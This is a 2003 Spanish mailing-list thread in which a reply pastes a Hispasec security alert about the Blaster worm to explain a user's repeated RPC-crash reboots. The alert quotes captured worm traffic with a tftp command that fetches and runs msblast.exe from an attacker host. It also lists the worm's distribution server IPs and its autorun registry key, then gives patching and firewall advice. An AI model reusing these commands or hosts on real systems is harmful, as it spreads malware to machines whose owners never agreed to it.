| Asunto: | RE: [SauloNet] RPC termino inesperadamente.... | | Fecha: | Martes, 12 de Agosto, 2003 12:01:01 (+0200) | | Autor: | Gabriel Czerniecki <gabriel @........es>
|
| En respuesta a: | Mensaje 2269 (escrito por Lic. Javier Martinez) |
Veo prudente copiar esta nota de una pagina colega....
Creo que esto responde a tu problema.
mirate en www.pandasoftware.com algo sobre "BLASTER"
Pego acá el mensaje.
Un saludo y espero que este no sea tu problema.
un saludo.
Gabriel Czerniecki
Aviso de urgencia: Un nuevo gusano de propagación masiva
--------------------------------------------------------
Hemos empezado a recibir informes de un nuevo gusano que se está
empezando a propagar. Utiliza la reciente vulnerabilidad descubierta en
el mecanismo RPC de todas las versiones de Windows. En el momento de
redactar este boletín de urgencia todavía no se conoce en detalle el
funcionamiento del gusano, ya que todavía está siendo analizado. Uno de
los efectos de este gusano es que provoca al reinicio del ordenador
infectado cada pocos minutos. A pesar de no disponer de muchos datos
acerca del mismo, hemos decidido publicar este boletín para advertir a
todos los lectores de 'una-al-día' sobre su existencia así como indicar
las medidas necesarias a tomar para evitar su propagación.
El gusano realiza un barrido de las direcciones IP con el objeto de
identificar los sistemas Windows vulnerables (sistemas con el puerto
135/tcp accesible). Cuando detecta la existencia de un sistema
vulnerable, utiliza la vulnerabilidad RPC para abrir una sesión del
intérprete de órdenes accesible de forma remota a través del puerto
4444/tcp.
Dentro de esta sesión, procede a descargar mediante tftp el código
binario de gusano. Este es el tráfico capturado de una máquina
infectada:
-------------tráfico 4444/tcp----------
tftp -i aaa.bbb.ccc.ddd GET msblast.exe
start msblast.exe
msblast.exe
HTTP/1.0 403 Forbidden
Server: AdSubtract 2.50
Content-Type: text/html;charset=utf-8
Content-Length: 349
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<title>Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<h2>Requests from host hostname.of.attacking.host/aaa.bbb.ccc.ddd not
allowed; only requests from localhost (127.0.0.1) are allowed.
</h2>
</body></html>
-------------tráfico 4444/tcp----------
mblast.exe es un archivo ejecutable de Windows, comprimido y que ocupa 6
KB. Su hash MD5 es
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
La descarga del mismo puede realizarse contra uno de estos servidores
tftp:
204.210.57.87
217.211.179.193
24.147.64.171
24.147.64.205
24.147.64.208
24.147.65.146
24.147.65.45
24.147.65.9
61.254.65.159
67.119.36.219
68.112.65.38
68.166.102.136
68.166.107.21
68.166.111.175
68.166.120.34
68.166.121.135
68.166.123.4
68.166.124.186
68.166.124.93
68.166.139.155
68.166.139.210
68.166.141.66
68.166.142.194
68.166.142.215
68.166.36.178
68.166.56.123
68.166.60.51
68.166.98.3
El gusano crea una entrada en el registro de Windows para ejecutarse
automáticamente cada vez que se arranca el sistema:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"windows auto update"="msblast.exe"
Más vale prevenir que curar
Para evitar la entrada del gusano, es importante verificar estos dos
aspectos clave:
1. Impedir las conexiones al puerto 135/tcp procedente de redes
inseguras, como puede ser Internet.
2. Verificar que se ha aplicado la actualización publicada por Microsoft
para eliminar la vulnerabilidad RPC. Esta actualización está disponible
a través del servicio Windows Update o bien descargando la actualización
específica (ver el "una-al-día" del pasado 18 de julio para las URL de
la actualización para cada versión de Windows).
Eliminación del virus
Los diferentes fabricantes de productos antivirus están en estos
momentos analizando el gusano y es de esperar que en pocos minutos
dispongan de actualizaciones que permitan eliminarlo. Aconsejamos a
todos los lectores de 'una-al-día' que procedan a realizar una
actualización del archivo de firmas de su programa antivirus y, a
continuación, una verificación integral de su ordenador.
Opina sobre esta noticia:
http://www.hispasec.com/unaaldia/1750/comentar
Más información
Una-al-día (18-07-03): Desbordamiento de búfer en interfaz RPC de
sistemas Windows
http://www.hispasec.com/unaaldia/1728
Una-al-día (27-07-03): Predicen gusano tras la publicación de un exploit
http://www.hispasec.com/unaaldia/1736
RPC DCOM. Preliminary Análisis
http://isc.sans.org/diary.html?date=2003-08-11
W32.Blaster.Worm
http://www.sarc.com/avcenter/venc/data/w32.blaster.worm.html
W32/Lovsan.Worm
http://vil.nai.com/vil/content/v_100547.htm
MS DCOM RPC Worm
https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf
The Microsoft Windows NT4/2000/XP/2003 RPC Buffer Overrun Exploit (MS03-026)
http://www.astalavista.com/library/auditing/guides/Windows_RPC_Hacking_Explo
it.pdf
--------------------------------------------------------------------------
-----Mensaje original-----
De: Lic. Javier Martinez [mailto:lic_javier_martinez@yahoo.com.ar]
Enviado el: martes, 12 de agosto de 2003 3:42
Para: consultas@usuarios.saulo.net
Asunto: [SauloNet] RPC termino inesperadamente....
Lunes, 11 de Agosto de 2003 (10:37 p.m.)
Hola !
AMIGOS ! ayuda URGENTE............hace una semna que tengo
funcionando WINDOWS XP (castellano, SP 1, version CORPORATIVA) sin
probelmas, y de un moemnto para otro, comenzo a
aparecerme un cartelito que dice :
" EL SERVICIO DE LLAMADA A PROCEDIMINETO REMOTO (rpc) A FINALIZADO
INESPERADAMENTE, EL EQUIPO SE REINICIARA EN XX SEGUNODS (60
segunos)"
A partir de eso, comienza una ceunta regresiva y al terminar SE
REINICIA WINDOWS cerrando TODOS mis programas....SIN PODER HACER
NADA........
si alguien le paso lo mismo y lo pudo solucionar POR FAVOPR
RESPONDA..y si alguien sabe el MOTIVO mejor..........
espero pronta rta !!!!!!!!!
Gracias
Hasta pronto.
--------------------------
Lic. Javier Martinez
Icq # 13576047
lic_javier_martinez@yahoo.com.ar
> Yo use con bastante exito un programa llamado VNC que lo puedes bajar
gratis
> de www.realvnc.com. Es muy sencillo y si no pretendes grandes prestaciones
> es mas conveniente que el PC Anywhere.
> Saludos
> Entre otras cosas me conecté a una maquina con W2000 desde una W98 sin
> ningun problema
> ----- Original Message -----
> From: "convalsa" <convalsa@cantv.net>
> To: <consultas@usuarios.saulo.net>
> Sent: Monday, August 11, 2003 12:28 PM
> Subject: [SauloNet] asesoria acceso remoto
> saludos saulo
> quiseira ver si me puedes ayudar
> tengo una red de 16 maquinas con una conexion a internet sobre puerta de
> enlace pero como podria conectarme remotamente desde un equipo con windows
> xp profesional a uno con windows 98 se. por favor si es una aplicacion
> gratis y que no sea muy complicada he hechos conexiones a escritorio
remoto
> pero solo con equipos que tienen windows xp pero cuando intento conectar a
> otra plataforma no me lo permite incluso instale el sofware de conexion
> remota que trae windows xp para otras maquinas y me puedo conextar
> remotamente con maquinas desde windows 98 se a eindows xp pero no me
permite
> conectarme al contrario si puedes por favor te lo agracesco saulo atn.
> heriberto Chirino. grasias
> ____________________________
> La lista de consultas y comentarios relacionados con Saulo.Net
> Información, bajas y altas en http://www.saulo.net/lista/
> ____________________________
> La lista de consultas y comentarios relacionados con Saulo.Net
> Información, bajas y altas en http://www.saulo.net/lista/
____________________________
La lista de consultas y comentarios relacionados con Saulo.Net
Información, bajas y altas en http://www.saulo.net/lista/
|
RE: RPC termino in
Responder a este mensaje